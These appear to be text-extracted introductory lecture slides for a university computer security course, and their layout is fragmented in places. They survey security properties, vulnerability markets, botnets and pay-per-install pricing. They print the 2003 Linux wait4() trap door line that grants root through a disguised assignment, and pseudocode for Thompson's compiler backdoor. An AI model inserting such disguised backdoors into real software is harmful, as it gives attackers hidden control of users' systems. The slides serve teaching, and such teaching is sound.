CS 155

Spring 2013

Computer and Network Security

Whats this course about?

Intro to computer and network security Some challenging fun projects

Learn about attacks Learn about preventing attacks Application and operating system security Web security Network security, Mobile app security
Not a course on cryptography (take CS255!)

Lectures on related topics

Dan Boneh and John Mitchell https://courseware.stanford.edu/pg/courses/CS155

Organization

(subject to change)

General course info

(see web)

Application and OS security (5 lectures)

Web security (4 lectures)

Buffer overflow project Vulnerabilities: control hijacking attacks, fuzzing Prevention: System design, robust coding, isolation Web site attack and defenses project Browser policies, session mgmt, user authentication HTTPS and web application security Network traceroute and packet filtering project Protocol designs, vulnerabilities, prevention Malware, botnets, DDoS, network security testing Cryptography (user perspective), digital rights management, final guest lecture,

Prerequisite: Operating systems (CS140) Textbook: none reading online Coursework

3 projects, 2 homeworks, final exam grade: 0.25 H + 0.5 P + 0.25 F

Network security (6 lectures)

Teaching assistants Occasional optional section

A few other topics

Introduction to project assignments

SECURITY CONCEPTS

What is security?
System correctness

What is security?
System correctness

If user supplies expected input, system generates desired output If attacker supplies unexpected input, system does not fail in certain ways

Good input Good output Bad input Bad output

Security

Security

What is security?
System correctness

Security properties
Confidentiality

More features: better More features: can be worse

Security

Information about system or its users cannot be learned by an attacker The system continues to operate properly, only reaching states that would occur if there were no attacker Actions by an attacker do not prevent users from having access to use of the system

Integrity

Availability

General picture

Network security
System

Alice

Attacker Network Attacker System Intercepts and controls network communication

Security is about

Honest user (e.g., Alice, Bob, ) Dishonest Attacker How the Attacker
Disrupts honest users use of the system (Integrity, Availability) Learns information intended for Alice only (Confidentiality)

Alice

Web security

Operating system security

System

Web Attacker Sets up malicious site visited by victim; no control of network Alice Alice

OS Attacker Controls malicious files and applications

System

Alice

Attacker

Confidentiality: Attacker does not learn Alices secrets Integrity: Attacker does not undetectably corrupt systems function for Alice Availability: Attacker does not keep system from being useful to Alice

TRENDS AND STATISTICS

The computer security problem

Lots of buggy software
(and gullible users)

MITRE tracks vulnerability disclosures

Cumulative Disclosures Percentage from Web applications

Money can be made from finding and exploiting vulnerabilities.

Marketplace for vulnerabilities Marketplace for owned machines (PPI) Many methods to profit from owned client machines
2010
Source: IBM X-Force, Mar 2011 Data: http://cve.mitre.org/

Reported Web Vulnerabilities "In the Wild"

Web vs System vulnerabilities

XSS peak

Decline in % web vulns since 2009

Data from aggregator and validator of NVD-reported vulnerabilities

49% in 2010 -> 37% in 2011. Big decline in SQL Injection vulnerabilities

Mobile Operating Systems

Mobile OS Vulnerabilities Mobile OS Exploits

Phishing?

Source: IBM X-Force, Mar 2011

Bot networks
Continue to be major problem (e.g., Spam)

THE MARKETPLACE FOR VULNERABILITIES

Marketplace for Vulnerabilities

Option 1: bug bounty programs Google Vulnerability Reward Program: 3K $ Mozilla Bug Bounty program: 500$ Pwn2Own competition: 15K $ Option 2: ZDI, iDefense: 2K 25K $

Marketplace for Vulnerabilities

Option 3: black market

Source: Charlie Miller

(securityevaluators.com/files/papers/0daymarket.pdf)

Marketplace for owned machines

clients spam
bot keylogger

Pay-per-install (PPI) services

Own victims machine Download and install clients code Charge client
Cost: US 100-180$ / 1000 machines Asia 7-8$ / 1000 machines

PPI service

ATTACKER GOALS, EXAMPLES

Victims

Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

The computer security problem

Lots of buggy software
(and gullible users)

Why own machines: IP address and bandwidth stealing

Attackers goal: look like a random Internet user Use the infected machines IP address for: Spam (e.g. the storm botnet) Spamalytics: 1:12M pharma spams leads to purchase
1:260K greeting card spams leads to infection

Money can be made from finding and exploiting vulnerabilities.

Marketplace for vulnerabilities Marketplace for owned machines (PPI) Many methods to profit from owned client machines

Denial of Service:

Services: 1 hour (20$), 24 hours (100$)

Click fraud (e.g. Clickbot.a)

Why own machines: Steal user credentials

keylog for banking passwords, web passwords, gaming pwds Example: SilentBanker (2007)
User requests login page

Why own machines: Spread to isolated systems

Example: Stuxtnet
Windows infection Siemens PCS 7 SCADA control software on Windows

Malware injects Javascript When user submits information, also sent to attacker

Bank sends login page needed to log in

Bank

Siemens device controller on isolated network

Similar mechanism used by Zeus botnet

More on this later in course

Drive-by Downloads

Web attack toolkit: MPack

Basic setup

Features

Toolkit hosted on web server Infects pages on that server Page visitors get infected Customized: determines exploit on the fly, based on users OS, browser, etc Easy to use: management console provides stats on infection rates Customer care toolkit can be purchased with one-year support contract!

34

Insider attacks: example

Hidden trap door in Linux

(nov 2003)

logs)

Allows attacker to take over a computer Practically undetectable change (uncovered via CVS

Inserted line in wait4()

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;

WHAT CAN YOU TRUST?

Looks like a standard error check, but

See: http://lwn.net/Articles/57135/

Ken Thompson
What code can we trust?

Compiler backdoor
This is the basis of Thompson's attack

Consider "login" or "su" in Unix Is RedHat binary reliable? Does it send your passwd to someone? Read source code or write your own Does this solve problem?

Can't trust binary so check source, recompile

Compiler looks for source code that looks like login program If found, insert login backdoor (allow special user to log in) Inspect the compiler source

How do we solve this?

Reflections on Trusting Trust, http://www.acm.org/classics/sep95/

C compiler is written in C
Change compiler source S
compiler(S) { if (match(S, "login-pattern")) { compile (login-backdoor) return } if (match(S, "compiler-pattern")) { compile (compiler-backdoor) return } .... /* compile as usual */ }

Clever trick to avoid detection

Compile this compiler and delete backdoor tests from source

Someone can compile standard compiler source to get new compiler, then compile login, and get login with backdoor Compiling the compiler twice might lose the backdoor But can making code for compiler backdoor output itself
(Can you write a program that prints itself? Recursion thm)

Simplest approach will only work once

Read Thompson's article

Short, but requires thought

Ethical use of security information

We discuss vulnerabilities and attacks

Most vulnerabilities have been fixed Some attacks may still cause harm Do not try these at home or anyplace else Learn to prevent malicious attacks Use knowledge for good purposes

Purpose of this class

CONCLUDING

If you remember only one thing from this course:

A vulnerability that is too complicated for anyone to ever find will be found and exploited !

We hope you remember more than one thing